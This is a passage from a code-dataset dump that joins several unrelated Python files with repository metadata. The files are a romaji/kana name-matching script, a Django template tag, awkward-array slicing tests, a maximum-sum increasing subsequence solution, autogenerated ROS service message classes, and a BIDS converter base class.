(s0,_,s1) = s.partition(':')
for c in (s0+s1)[:-1]:
if c in t0:
(_,_,t1) = t0[c]
else:
t1 = {}
t0[c] = (None, None, t1)
t0 = t1
c = (s0+s1)[-1]
if c in t0:
(obj,_,t1) = t0[c]
if obj is not None and not allowConflict:
raise ValueError('already defined: %r' % s)
else:
t1 = {}
t0[c] = (m, s0, t1)
return
def parse(self, s, i0=0):
i1 = i0
t0 = self._tree
m = s0 = None
while i1 < len(s):
c = s[i1].lower()
if c in t0:
(m,s0,t1) = t0[c]
i1 += 1
t0 = t1
elif m is not None:
yield (s[i0:i1], m)
i0 = i1 = i0+len(s0)
t0 = self._tree
m = s0 = None
else:
yield (s[i1], None)
i0 = i1 = i1+1
t0 = self._tree
if m is not None:
yield (s[i0:], m)
return
class MoraParserOfficial(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.roff:
self.add(k, m)
self.add('nn', MoraTable.MORA_NN)
return
class MoraParserOfficialAnna(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.roff:
self.add(k, m)
self.add('n', MoraTable.MORA_NN)
return
class MoraParserEnglish(MoraParser):
def __init__(self):
MoraParser.__init__(self)
for m in MoraTable.ALL:
for k in m.reng:
self.add(k, m)
return
## String Generator
##
class StringGenerator:
def generate(self, seq):
s = ''
m1 = None
for m2 in seq:
if m1 is None:
pass
elif isinstance(m1, Mora):
s += self.convert(m1, m2)
else:
s += m1
m1 = m2
if m1 is None:
pass
elif isinstance(m1, Mora):
s += self.convert(m1, None)
else:
s += m1
return s
def convert(self, m1, m2=None):
return m1.zenk
class GeneratorOfficial(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.roff[0]
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if not isinstance(m2, Mora) or m2.mid[0] not in '.ynN':
return 'n' # NN+C -> "n"+C
return m1.roff[0]
class GeneratorOfficialAnna(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.roff[0]
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if not isinstance(m2, Mora) or m2.mid[0] not in '.y':
return 'n' # NN+C -> "n"+C
return m1.roff[0]
class GeneratorEnglish(StringGenerator):
def convert(self, m1, m2=None):
if m1.mid == '.t':
if isinstance(m2, Mora):
k = m2.reng[0]
if not k.startswith('c'):
return k[0] # double the consonant
return 't'
elif m1.mid == '.n':
if isinstance(m2, Mora) and m2.mid[0] in 'pP':
return 'm' # NN+"p" -> "mp"
elif not isinstance(m2, Mora) or m2.mid[0] not in '.y':
return 'n' # NN+C -> "n"+C
return m1.reng[0]
PARSE_ENGLISH = MoraParserEnglish()
GEN = StringGenerator()
GEN_ENGLISH = GeneratorEnglish()
# expand(s): expand a name string into the normalized match features used below
# (lowercase words, a katakana rendering, normalized romaji, and their pairwise concatenations).
def expand(s):
words = []
w = ''
for c in s:
if c.isalpha():
w += c
elif w:
words.append(w)
w = ''
if w:
words.append(w)
a = []
for w in words:
a.append(w.lower())
w1 = w2 = ''
for (s,m) in PARSE_ENGLISH.parse(w):
if m is not None:
w1 += m.zenk
w2 += m.reng[0].lower()
if w1:
a.append(w1)
if w2:
a.append(w2)
for w1 in a:
yield w1
if "'" in w1:
yield w1.replace("'",'')
for w2 in a:
if w1 != w2:
w = w1+w2
yield w
if "'" in w:
yield w.replace("'",'')
return
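# Illustrative use of expand() (added note, not part of the original script): each
# feature it yields is what IndexDB stores and looks up, so the same person can be
# matched from romaji, kana, or mixed spellings of the same name, e.g.:
#   for feat in expand('Yusuke Shinyama'):
#       print(feat)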
class IndexDB:
def __init__(self):
self.index = {}
return
def add(self, name, uid):
# name -> {feats} -> uid
feats = set(expand(name))
for f in feats:
self.addraw(f, uid)
return
def addraw(self, feat, uid):
if feat in self.index:
a = self.index[feat]
else:
a = self.index[feat] = set()
a.add(uid)
return
def lookup(self, name):
# name -> {feats} -> uid
feats = set(expand(name))
uids = None
for f in feats:
if f not in self.index: continue
a = self.index[f]
if uids is None:
uids = a
else:
uids = uids.intersection(a)
return uids
def main(argv):
import getopt
def usage():
print('usage: %s [-i input] [-p HH:MM[-HH:MM]] [file ...]' % argv[0])
return 100
try:
(opts, args) = getopt.getopt(argv[1:], 'i:p:')
except getopt.GetoptError:
return usage()
db = IndexDB()
r0 = r1 = None
for (k, v) in opts:
if k == '-i':
path = v
if path.endswith('.csv'):
with open(path, encoding='cp932') as fp:
table = list(csv.reader(fp))
for row in table[1:]:
uid = row[2]
db.addraw(row[2], uid)
db.add(row[3], uid)
db.add(row[4], uid)
else:
with open(path) as fp:
for line in fp:
(line,_,_) = line.strip().partition('#')
if not line: continue
f = line.split()
uid = f.pop(0)
for w in f:
db.add(w, uid)
elif k == '-p':
(t1,_,t2) = v.partition('-')
(h,_,m) = t1.partition(':')
r1 = r0 = time(int(h), int(m))
if t2:
(h,_,m) = t2.partition(':')
r1 = time(int(h), int(m))
assert r0 <= r1
for path in args:
with open(path) as fp:
table = list(csv.reader(fp))
for row in table[1:]:
name = row[0]
dt0 = datetime.strptime(row[2], '%Y/%m/%d %H:%M:%S')
dt1 = datetime.strptime(row[3], '%Y/%m/%d %H:%M:%S')
t0 = dt0.time()
t1 = dt1.time()
if r0 is not None and (t1 < r0 or r1 < t0): continue
uids = db.lookup(name)
if uids is None:
print(f'# notfound: {name}')
elif 2 < len(uids):
print(f'# ambiguous: {name} {uids}')
else:
uid = list(uids)[0]
print(f'{uid} # {name}')
return 0
if __name__ == '__main__': sys.exit(main(sys.argv))
| [
"[email protected]"
] | |
49ada0f710f8c4cfc75d72062f98d7d676d520c4 | f8e71f84205a81d11d4fda4c53c2db9b3fa0dd65 | /chloroform/templatetags/chloroform.py | 95be5897475b86ac48c76cfe10f7beb600cdde71 | [] | no_license | cecedille1/chloroform | 789dbf0e283ae8bc561de63317b0c21a6ff01fe9 | 68a68cb3d094e69987135668abd2ebcb80b993b1 | refs/heads/master | 2021-06-03T00:45:30.426587 | 2018-04-23T10:17:10 | 2018-04-23T10:17:10 | 254,330,099 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 949 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from django import template
from chloroform.forms import ContactFormBuilder
from chloroform.models import Configuration
from chloroform.helpers import ChloroformTagHelper, FormHelperGetterMixin
register = template.Library()
class ChloroformHelperGetter(FormHelperGetterMixin):
form_helper_class = ChloroformTagHelper
@register.inclusion_tag('chloroform/tag.html')
def chloroform(name=None):
if isinstance(name, Configuration):
conf = name
elif name is None:
conf = Configuration.objects.get_default()
else:
conf = Configuration.objects.get(name=name)
helper_getter = ChloroformHelperGetter()
form_builder = ContactFormBuilder(conf)
form_class = form_builder.get_form()
form = form_class()
return {
'form_helper': helper_getter.get_form_helper(form),
'configuration': conf,
'form': form,
}
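# Typical template usage (illustrative sketch, assuming standard Django tag loading;
# not taken from this repository's docs):
#   {% load chloroform %}
#   {% chloroform %}            -- renders the default Configuration
#   {% chloroform "support" %}  -- renders the Configuration named "support"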
| [
"[email protected]"
] | |
30e78d2b6cb33880f8469deab8d18521ad8705d3 | ef76f8bcea6cc5331b4c8873704426f1aacfd60d | /tests/test_likenumpy.py | 33b1e97bd9a7e2c4fce6a68e09a09b1832715d35 | [
"BSD-3-Clause"
] | permissive | DumbMachine/awkward-array | 10a51c8ac471839e435bb471f45b6624c4f982cb | 8f54cc5d4de3bc56628676243bfe63c683667f16 | refs/heads/master | 2020-04-15T17:43:42.684480 | 2019-01-18T18:39:46 | 2019-01-18T18:39:46 | 164,884,686 | 1 | 0 | BSD-3-Clause | 2019-01-18T18:33:23 | 2019-01-09T15:06:24 | Python | UTF-8 | Python | false | false | 6,027 | py | #!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import numpy
import awkward
class Test(unittest.TestCase):
def runTest(self):
pass
def test_likenumpy_slices(self):
print()
np = numpy.array([[1, 10, 100], [2, 20, 200], [3, 30, 300]])
aw = awkward.fromiter(np)
assert np.tolist() == aw.tolist()
assert np[:2].tolist() == aw[:2].tolist()
assert np[:2, :2].tolist() == aw[:2, :2].tolist()
assert np[:2, 2].tolist() == aw[:2, 2].tolist()
assert np[2, :2].tolist() == aw[2, :2].tolist()
assert np[:2, [0, 1]].tolist() == aw[:2, [0, 1]].tolist()
assert np[[0, 1], :2].tolist() == aw[[0, 1], :2].tolist()
assert np[:2, [0, 1, 2]].tolist() == aw[:2, [0, 1, 2]].tolist()
assert np[[0, 1, 2], :2].tolist() == aw[[0, 1, 2], :2].tolist()
assert np[[0, 1], [0, 1]].tolist() == aw[[0, 1], [0, 1]].tolist()
assert np[[0, 1, 2], [0, 1, 2]].tolist() == aw[[0, 1, 2], [0, 1, 2]].tolist()
assert np[:2, [True, False, True]].tolist() == aw[:2, [True, False, True]].tolist()
assert np[[True, False, True], :2].tolist() == aw[[True, False, True], :2].tolist()
assert np[[True, False, True], [True, False, True]].tolist() == aw[[True, False, True], [True, False, True]].tolist()
np = numpy.array([[[1, 10, 100], [2, 20, 200], [3, 30, 300]], [[4, 40, 400], [5, 50, 500], [6, 60, 600]], [[7, 70, 700], [8, 80, 800], [9, 90, 900]]])
aw = awkward.fromiter(np)
assert np.tolist() == aw.tolist()
assert np[:2].tolist() == aw[:2].tolist()
assert np[:2, :2].tolist() == aw[:2, :2].tolist()
assert np[:2, 2].tolist() == aw[:2, 2].tolist()
assert np[2, :2].tolist() == aw[2, :2].tolist()
assert np[:2, [0, 1]].tolist() == aw[:2, [0, 1]].tolist()
assert np[[0, 1], :2].tolist() == aw[[0, 1], :2].tolist()
assert np[:2, [0, 1, 2]].tolist() == aw[:2, [0, 1, 2]].tolist()
assert np[[0, 1, 2], :2].tolist() == aw[[0, 1, 2], :2].tolist()
assert np[[0, 1], [0, 1]].tolist() == aw[[0, 1], [0, 1]].tolist()
assert np[[0, 1, 2], [0, 1, 2]].tolist() == aw[[0, 1, 2], [0, 1, 2]].tolist()
assert np[:2, [True, False, True]].tolist() == aw[:2, [True, False, True]].tolist()
assert np[[True, False, True], :2].tolist() == aw[[True, False, True], :2].tolist()
assert np[[True, False, True], [True, False, True]].tolist() == aw[[True, False, True], [True, False, True]].tolist()
assert np[:2, :2, 0].tolist() == aw[:2, :2, 0].tolist()
assert np[:2, 2, 0].tolist() == aw[:2, 2, 0].tolist()
assert np[2, :2, 0].tolist() == aw[2, :2, 0].tolist()
assert np[:2, [0, 1], 0].tolist() == aw[:2, [0, 1], 0].tolist()
assert np[[0, 1], :2, 0].tolist() == aw[[0, 1], :2, 0].tolist()
assert np[:2, [0, 1, 2], 0].tolist() == aw[:2, [0, 1, 2], 0].tolist()
assert np[[0, 1, 2], :2, 0].tolist() == aw[[0, 1, 2], :2, 0].tolist()
assert np[[0, 1], [0, 1], 0].tolist() == aw[[0, 1], [0, 1], 0].tolist()
assert np[[0, 1, 2], [0, 1, 2], 0].tolist() == aw[[0, 1, 2], [0, 1, 2], 0].tolist()
assert np[:2, [True, False, True], 0].tolist() == aw[:2, [True, False, True], 0].tolist()
assert np[[True, False, True], :2, 0].tolist() == aw[[True, False, True], :2, 0].tolist()
assert np[[True, False, True], [True, False, True], 0].tolist() == aw[[True, False, True], [True, False, True], 0].tolist()
assert np[:2, :2, 1].tolist() == aw[:2, :2, 1].tolist()
assert np[:2, 2, 1].tolist() == aw[:2, 2, 1].tolist()
assert np[2, :2, 1].tolist() == aw[2, :2, 1].tolist()
assert np[:2, [0, 1], 1].tolist() == aw[:2, [0, 1], 1].tolist()
assert np[[0, 1], :2, 1].tolist() == aw[[0, 1], :2, 1].tolist()
assert np[:2, [0, 1, 2], 1].tolist() == aw[:2, [0, 1, 2], 1].tolist()
assert np[[0, 1, 2], :2, 1].tolist() == aw[[0, 1, 2], :2, 1].tolist()
assert np[[0, 1], [0, 1], 1].tolist() == aw[[0, 1], [0, 1], 1].tolist()
assert np[[0, 1, 2], [0, 1, 2], 1].tolist() == aw[[0, 1, 2], [0, 1, 2], 1].tolist()
assert np[:2, [True, False, True], 1].tolist() == aw[:2, [True, False, True], 1].tolist()
assert np[[True, False, True], :2, 1].tolist() == aw[[True, False, True], :2, 1].tolist()
assert np[[True, False, True], [True, False, True], 1].tolist() == aw[[True, False, True], [True, False, True], 1].tolist()
| [
"[email protected]"
] | |
0430c8e68c0e36d441ff3a4c2768d2abb1a26a4f | 7847756062b6952fd881e3f0896c1dc600a0ba66 | /Arrays and Strings/MaximumSumIncreasingSubsequence.py | 74ae17c3980ecfff8c398cb3f0baa89e62e521b9 | [
"MIT"
] | permissive | renowncoder/hello-interview | be22214f02631a9e17643af054cfbe3411c8da1a | 78f6cf4e2da4106fd07f4bd86247026396075c69 | refs/heads/master | 2021-01-03T11:36:30.862323 | 2019-06-01T02:58:22 | 2019-06-01T02:58:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 965 | py | """
Maximum Sum Increasing Subsequence
https://practice.geeksforgeeks.org/problems/maximum-sum-increasing-subsequence/0/?ref=self
"""
def maximum_sum_increasing_subsequence(numbers, size):
"""
    Given an array of n positive integers, return the maximum possible sum of a
    subsequence of the array whose integers appear in strictly increasing order.
"""
results = [numbers[i] for i in range(size)]
for i in range(1, size):
for j in range(i):
if numbers[i] > numbers[j] and results[i] < results[j] + numbers[i]:
results[i] = results[j] + numbers[i]
return max(results)
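# Worked example: for [1, 101, 2, 3, 100] the best increasing subsequence by sum is
# 1 + 2 + 3 + 100 = 106 (beating 1 + 101 = 102), so the function returns 106.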
def main():
"""
driver function
"""
test_cases = int(input())
while test_cases > 0:
size = int(input())
numbers = list(map(int, input().strip().split(" ")))
print(maximum_sum_increasing_subsequence(numbers, size))
test_cases -= 1
main() | [
"[email protected]"
] | |
2504e3d14d7c689b9a20d6c18fc8b18a0c2c892e | 75a3749bbcede8e9ba432ec4422e3e55ff01852d | /devel/lib/python2.7/dist-packages/kautham/srv/_ReqPlan.py | 206e039157b1e2ac8103f985802156b6668c25a8 | [] | no_license | fersolerv/Ros_Regrasp | 749508dc992dda35b36b6f8952c7e40b2ae18bf0 | 8f6b3ac0ec16bff13890abc60a1c5acc6289c9ea | refs/heads/master | 2020-03-22T03:18:15.049574 | 2019-08-29T12:58:41 | 2019-08-29T12:58:41 | 139,424,017 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,355 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from kautham/ReqPlanRequest.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import std_msgs.msg
class ReqPlanRequest(genpy.Message):
_md5sum = "fb05da14d2435383dc6c819a190caa0e"
_type = "kautham/ReqPlanRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """std_msgs/String problem
================================================================================
MSG: std_msgs/String
string data
"""
__slots__ = ['problem']
_slot_types = ['std_msgs/String']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
problem
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ReqPlanRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.problem is None:
self.problem = std_msgs.msg.String()
else:
self.problem = std_msgs.msg.String()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.problem.data
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.problem is None:
self.problem = std_msgs.msg.String()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.problem.data = str[start:end].decode('utf-8')
else:
self.problem.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self.problem.data
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.problem is None:
self.problem = std_msgs.msg.String()
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.problem.data = str[start:end].decode('utf-8')
else:
self.problem.data = str[start:end]
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from kautham/ReqPlanResponse.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import trajectory_msgs.msg
import genpy
import std_msgs.msg
class ReqPlanResponse(genpy.Message):
_md5sum = "1406506fbfd269e79e1a93b4e8386da6"
_type = "kautham/ReqPlanResponse"
_has_header = False #flag to mark the presence of a Header object
_full_text = """trajectory_msgs/JointTrajectory plan
================================================================================
MSG: trajectory_msgs/JointTrajectory
Header header
string[] joint_names
JointTrajectoryPoint[] points
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: trajectory_msgs/JointTrajectoryPoint
# Each trajectory point specifies either positions[, velocities[, accelerations]]
# or positions[, effort] for the trajectory to be executed.
# All specified values are in the same order as the joint names in JointTrajectory.msg
float64[] positions
float64[] velocities
float64[] accelerations
float64[] effort
duration time_from_start
"""
__slots__ = ['plan']
_slot_types = ['trajectory_msgs/JointTrajectory']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
plan
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(ReqPlanResponse, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.plan is None:
self.plan = trajectory_msgs.msg.JointTrajectory()
else:
self.plan = trajectory_msgs.msg.JointTrajectory()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs))
_x = self.plan.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.plan.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.plan.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.plan.points)
buff.write(_struct_I.pack(length))
for val1 in self.plan.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.positions))
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.velocities))
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.accelerations))
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val1.effort))
_v1 = val1.time_from_start
_x = _v1
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.plan is None:
self.plan = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.plan.header.frame_id = str[start:end].decode('utf-8')
else:
self.plan.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.plan.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = struct.unpack(pattern, str[start:end])
_v2 = val1.time_from_start
_x = _v2
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.plan.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_3I().pack(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs))
_x = self.plan.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.plan.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.plan.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.plan.points)
buff.write(_struct_I.pack(length))
for val1 in self.plan.points:
length = len(val1.positions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.positions.tostring())
length = len(val1.velocities)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.velocities.tostring())
length = len(val1.accelerations)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.accelerations.tostring())
length = len(val1.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val1.effort.tostring())
_v3 = val1.time_from_start
_x = _v3
buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.plan is None:
self.plan = trajectory_msgs.msg.JointTrajectory()
end = 0
_x = self
start = end
end += 12
(_x.plan.header.seq, _x.plan.header.stamp.secs, _x.plan.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.plan.header.frame_id = str[start:end].decode('utf-8')
else:
self.plan.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.plan.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.plan.points = []
for i in range(0, length):
val1 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val1.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_v4 = val1.time_from_start
_x = _v4
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.plan.points.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_3I = None
def _get_struct_3I():
global _struct_3I
if _struct_3I is None:
_struct_3I = struct.Struct("<3I")
return _struct_3I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
class ReqPlan(object):
_type = 'kautham/ReqPlan'
_md5sum = 'c28c6945c8dac4a6baf20710ae93dd37'
_request_class = ReqPlanRequest
_response_class = ReqPlanResponse
| [
"[email protected]"
] | |
7d7826a4d5a3e34518f0869319124c892f24f540 | f47fb0266f9f90bff0b6701f6cb46083f565e028 | /ando/tools/generator/bidsconverter.py | 6f5b2a8ef61356ea80674b86dcf73fcdbd12ff6b | [
"MIT"
] | permissive | Slowblitz/AnDO | d8dc452a9ea0b34e0b96ec8f1e542652ee1be6ce | c6c6477f41342fb31de57da097ee066c96e9130c | refs/heads/master | 2023-05-28T00:57:23.249749 | 2021-05-18T07:17:54 | 2021-05-18T07:17:54 | 330,702,652 | 0 | 0 | MIT | 2021-01-18T15:07:00 | 2021-01-18T15:06:59 | null | UTF-8 | Python | false | false | 2,951 | py | from abc import ABC, abstractmethod
from collections import defaultdict
from pathlib import Path
class BidsConverter(ABC):
def __init__(self, dataset_path, **kwargs):
self.dataset_path = Path(dataset_path)
self._kwargs = kwargs
self._participants_dict = dict(name=Path('participants.tsv'),
data=None)
self._dataset_desc_json = dict(name=Path('dataset_description.json'),
data=None)
self._sessions_dict = defaultdict(dict)
self._channels_dict = defaultdict(dict)
